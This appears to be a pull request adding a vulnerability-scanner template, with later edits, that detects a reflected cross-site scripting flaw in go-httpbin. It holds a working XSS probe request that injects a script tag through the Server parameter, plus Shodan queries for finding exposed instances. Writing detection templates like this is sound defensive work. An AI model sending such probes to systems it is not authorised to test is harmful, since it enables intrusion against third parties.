### PR TITLE
Added httpbin-contenttype-xss.yaml

### DIFF
--- a/http/vulnerabilities/httpbin/httpbin-contenttype-xss.yaml
+++ b/http/vulnerabilities/httpbin/httpbin-contenttype-xss.yaml
@@ -1,0 +1,42 @@
+id: httpbin-contenttype-xss
+
+info:
+  name: HTTPBin - Cross-Site Scripting
+  author: ayushxtha
+  severity: high
+  description: HTTPBin contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  reference:
+    - https://github.com/mccutchen/go-httpbin/security/advisories/GHSA-528q-4pgm-wvg2
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  metadata:
+    max-request: 1
+    shodan-query:
+      - html:"https://github.com/mccutchen/go-httpbin"
+      - title:"httpbingo.org"
+  tags: xss,httpbin,oss
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/response-headers?Content-Type=text/html&Server=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '^{'
+          - '<script>alert\(document.domain\)</script>'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

--- a/http/vulnerabilities/other/httpbin-contenttype-xss.yaml
+++ b/http/vulnerabilities/other/httpbin-contenttype-xss.yaml
@@ -27,7 +27,7 @@ http:
       - type: word
         part: body
         words:
-          - '"Server": ['
+          - '"Server":'
           - '"<script>alert(document.domain)</script>"'
         condition: and
 

--- a/http/vulnerabilities/other/httpbin-contenttype-xss.yaml
+++ b/http/vulnerabilities/other/httpbin-contenttype-xss.yaml
@@ -3,8 +3,9 @@ id: httpbin-contenttype-xss
 info:
   name: HTTPBin - Cross-Site Scripting
   author: ayushxtha
-  severity: high
-  description: HTTPBin contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  severity: medium
+  description: |
+    HTTPBin contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
   reference:
     - https://github.com/mccutchen/go-httpbin/security/advisories/GHSA-528q-4pgm-wvg2
   classification:
@@ -13,9 +14,7 @@ info:
     cwe-id: CWE-79
   metadata:
     max-request: 1
-    shodan-query:
-      - html:"https://github.com/mccutchen/go-httpbin"
-      - title:"httpbingo.org"
+    shodan-query: html:"httpbingo.org"
   tags: xss,httpbin,oss
 
 http:
@@ -25,15 +24,15 @@ http:
 
     matchers-condition: and
     matchers:
-      - type: regex
+      - type: word
         part: body
-        regex:
-          - '^{'
-          - '<script>alert\(document.domain\)</script>'
+        words:
+          - '"Server": ['
+          - '"<script>alert(document.domain)</script>"'
         condition: and
 
       - type: word
-        part: header
+        part: content_type
         words:
           - text/html
 


### PR DESCRIPTION
### Template / PR Information

The vulnerability is Reflected XSS in go-httpbin due to unrestricted client control over Content-Type. The go-httpbin framework is vulnerable to XSS as the user can control the Response Content-Type from GET parameter. This allows attacker to execute cross site scripts in victims browser.

- References: https://github.com/mccutchen/go-httpbin/security/advisories/GHSA-528q-4pgm-wvg2

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

    shodan-query:
      - html:"https://github.com/mccutchen/go-httpbin"
      - title:"httpbingo.org"
